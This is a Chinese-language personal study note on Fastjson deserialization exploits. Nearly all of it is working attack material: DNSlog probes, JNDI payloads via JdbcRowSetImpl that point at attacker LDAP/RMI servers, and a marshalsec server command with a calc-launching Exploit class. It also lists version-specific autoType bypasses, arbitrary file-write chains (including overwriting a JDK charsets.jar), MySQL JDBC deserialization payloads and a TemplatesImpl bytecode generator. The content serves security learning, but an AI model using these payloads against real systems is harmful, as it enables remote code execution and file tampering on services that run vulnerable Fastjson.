fastjson反序列化学习

复现

测试版本1.2.47

dnslog判断

{"@type":"java.net.Inet4Address", "val":"dnslog"}
{"@type":"java.net.Inet6Address", "val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":, "val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL", "val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL", "val":"dnslog"}]
Set[{"@type":"java.net.URL", "val":"dnslog"}
{{"@type":"java.net.URL", "val":"dnslog"}:0
[{"a":"a\x] dos漏洞
{"a":"
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
{{"@type":"java.net.URL","val":"dnslog"}:0
{{"@type":"java.net.URL","val":"http://%s"}:"x"}

<1.2.67
{"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}}

>1.2.67
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

{"@type":"java.lang.AutoCloseable"
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://quw3hz.dnslog.cn",
        "autoCommit":true
    }
}

JdbcRowSetImpl

python3 -m http.server
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Log4jRCE" 1389

Exploit.java

public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec(new String[]{"calc.exe"});
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

payload

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://127.0.0.1:1389/Calc",
        "autoCommit": true
    }
}

image-20211222221954954

java高版本绕过

参考:

https://www.penson.top/article/av29#toc-heading-4

payload集合:

影响版本:

fastjson<=1.2.24

exp:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}

影响版本:

fastjson<=1.2.41

前提: autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

影响版本:

fastjson<=1.2.42

前提: autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

影响版本:

fastjson<=1.2.43

前提: autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

影响版本:

fastjson<=1.2.45

前提: autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}

影响版本:

fastjson<=1.2.47

exp:

{    "a": {        "@type": "java.lang.Class",         "val": "com.sun.rowset.JdbcRowSetImpl"    },     "b": {        "@type": "com.sun.rowset.JdbcRowSetImpl",         "dataSourceName": "ldap://x.x.x.x:1999/Exploit",         "autoCommit": true    }}

影响版本:

fastjson<=1.2.62

exp:

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}"

影响版本:

fastjson<=1.2.66

前提: autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}

fastjson<=1.2.68 任意文件写入

{    "x":{        "@type":"java.lang.AutoCloseable",        "@type":"sun.rmi.server.MarshalOutputStream",        "out":{            "@type":"java.util.zip.InflaterOutputStream",            "out":{                "@type":"java.io.FileOutputStream",                "file":"/tmp/dest.txt",                "append":false            },            "infl":{                "input":"eJwL8nUyNDJSyCxWyEgtSgUAHKUENw=="            },            "bufLen":1048576        },        "protocolVersion":1    }}{"x":{"@type":"java.lang.AutoCloseable","@type":"sun.rmi.server.MarshalOutputStream","out":{"@type":"java.util.zip.InflaterOutputStream","out":{"@type":"java.io.FileOutputStream","file":"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.282.b08-1.el7_9.x86_64/jre/lib/charsets.jar","append":false},"infl":{"input":"xxx"},"bufLen":1048576},"protocolVersion":1}}{"x":{"@type":"java.nio.charset.Charset","val":"500"}}

这个利用链仅仅存在centos中,范围还是苛刻的,我在win下测试的时候一直报错,一番搜索最终找到了原因

fastjson 在通过带参构造函数进行反序列化时,会检查参数是否有参数名,只有含有参数名的带参构造函数才会被认可

而sun.rmi.server.MarshalOutputStream在win下是没有的

commons-io任意文件写入

ReaderInputStream + CharSequenceReader 创建输入流

WriterOutputStream + FileWriterWithEncoding创建输出流

{  "x":{    "@type":"com.alibaba.fastjson.JSONObject",    "input":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.ReaderInputStream",      "reader":{        "@type":"org.apache.commons.io.input.CharSequenceReader",        "charSequence":{"@type":"java.lang.String""aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaapenson"      },      "charsetName":"UTF-8",      "bufferSize":1024    },    "branch":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.output.WriterOutputStream",      "writer":{        "@type":"org.apache.commons.io.output.FileWriterWithEncoding",        "file":"./1.txt",        "encoding":"UTF-8",        "append": false      },      "charsetName":"UTF-8",      "bufferSize": 1024,      "writeImmediately": true    },    "trigger":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "is":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    },    "trigger2":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "is":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    },    "trigger3":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "is":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    }  }}
XmlStreamReader::InputStream is TeeInputStream::InputStream input && TeeInputStream::OutputStream branch         writerOutputStream && readerInputStream
import org.apache.commons.io.input.CharSequenceReader;import org.apache.commons.io.input.ReaderInputStream;import org.apache.commons.io.input.TeeInputStream;import org.apache.commons.io.input.XmlStreamReader;import org.apache.commons.io.output.FileWriterWithEncoding;import org.apache.commons.io.output.WriterOutputStream;public class Test {    public static void main(String[] args) throws Exception {        String test="asd";        CharSequenceReader charSequenceReader = new CharSequenceReader(test);        ReaderInputStream readerInputStream = new ReaderInputStream(charSequenceReader,"UTF-8",1024);        FileWriterWithEncoding fileWriterWithEncoding = new FileWriterWithEncoding("1.txt","UTF-8");        WriterOutputStream writerOutputStream = new WriterOutputStream(fileWriterWithEncoding,"UTF-8",1024,true);        TeeInputStream teeInputStream = new TeeInputStream(readerInputStream,writerOutputStream);        XmlStreamReader xmlStreamReader = new XmlStreamReader(teeInputStream);    }}

缺点:只写入前8192个字符

需要依赖

        <dependency>            <groupId>commons-io</groupId>            <artifactId>commons-io</artifactId>            <version>2.5</version>        </dependency>

具体分析长亭那篇已经很详细,这里只做总结

参考:

https://www.cnblogs.com/zpchcbd/p/14969606.html

https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg

fastjson <=1.2.68 jdbc 反序列化

       <dependency>            <groupId>mysql</groupId>            <artifactId>mysql-connector-java</artifactId>            <version>5.1.12</version>        </dependency>        { "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "127.0.0.1", "portToConnectTo": 3306, "info": { "user": "CommonsCollections2", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" }, "databaseToConnectTo": "dbname", "url": "" } }

CommonsCollection2 为要利用的cc链

     <dependency>            <groupId>mysql</groupId>            <artifactId>mysql-connector-java</artifactId>            <version>6.0.2</version>        </dependency>                        { "name": { "@type":"java.lang.AutoCloseable", "@type":"com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection", "proxy": { "connectionString":{ "url":"jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&useSSL=false&user=yso_CommonsCollections2_calc" } } }}

https://github.com/fnmsd/MySQL_Fake_Server

需要恶意mysql服务器,前辈已经写好了

参考:

https://www.cnblogs.com/pickmea/p/15157189.html

fastjson 1.2.68

{"@type":"java.lang.AutoCloseable", "@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"172.20.64.40","portToConnectTo":3306,"url":"jdbc:mysql://172.20.64.40:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","databaseToConnectTo":"test","info":{"@type":"java.util.Properties","PORT":"3306","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","user":"yso_URLDNS_http://ahfladhjfd.6fehoy.dnslog.cn","PORT.1":"3306","HOST.1":"172.20.64.40","NUM_HOSTS":"1","HOST":"172.20.64.40","DBNAME":"test"}}

不出网解决

利用方式:

com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl

TemplatesImpl的POC构造比JdbcRowSetImpl复杂些,而且对反序列化的SerializerFeature参数有要求,使用parseObject时需要JSON.parseObject(json, Object.class, Feature.SupportNonPublicField)parse方法时需要JSON.parse(json,Feature.SupportNonPublicField),但好处就是无需出网加载恶意类。

其实就是魔改yso的cc链,但是这个利用条件还是挺苛刻的,需要有Feature

package com.fastjson;import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.parser.Feature;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import javassist.CannotCompileException;import javassist.ClassPool;import javassist.CtClass;import javassist.CtNewConstructor;import org.apache.tomcat.util.codec.binary.Base64;public class TemplatesImpl {    public static CtClass makeClass() throws CannotCompileException {        ClassPool classPool = ClassPool.getDefault();        CtClass clazz = classPool.makeClass("com.summersec.x.Test" + System.nanoTime());        clazz.addConstructor(CtNewConstructor.make("public Test(){ Runtime.getRuntime().exec(\"calc.exe\");}",clazz));        return clazz;    }    public static void main(String args[]) throws Exception {        ClassPool aDefault = ClassPool.getDefault();        CtClass ctClass = makeClass();        ctClass.setSuperclass((aDefault.get(AbstractTranslet.class.getName())));            byte[] evilCode = ctClass.toBytecode();            String encode = Base64.encodeBase64String(evilCode);            String json = "{" +                    "    \"a\": {" +                    "        \"@type\": \"java.lang.Class\"," +                    "        \"val\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"" +                    "        }," +                    "    \"b\": {" +                    "        \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"," +                    "        \"_bytecodes\": [\""+encode+"\"]," +                    "        '_name': 'a.b'," +                    "        '_tfactory': {}," +                    "        \"_outputProperties\": {}," +                    "        \"_name\": \"b\"," +                    "        \"_version\": \"1.0\"," +                    "        \"allowedProtocols\": \"all\"" +                    "      }" +                    "}";            System.out.println(json);            JSON.parseObject(json, Object.class, Feature.SupportNonPublicField);    }}

payload:

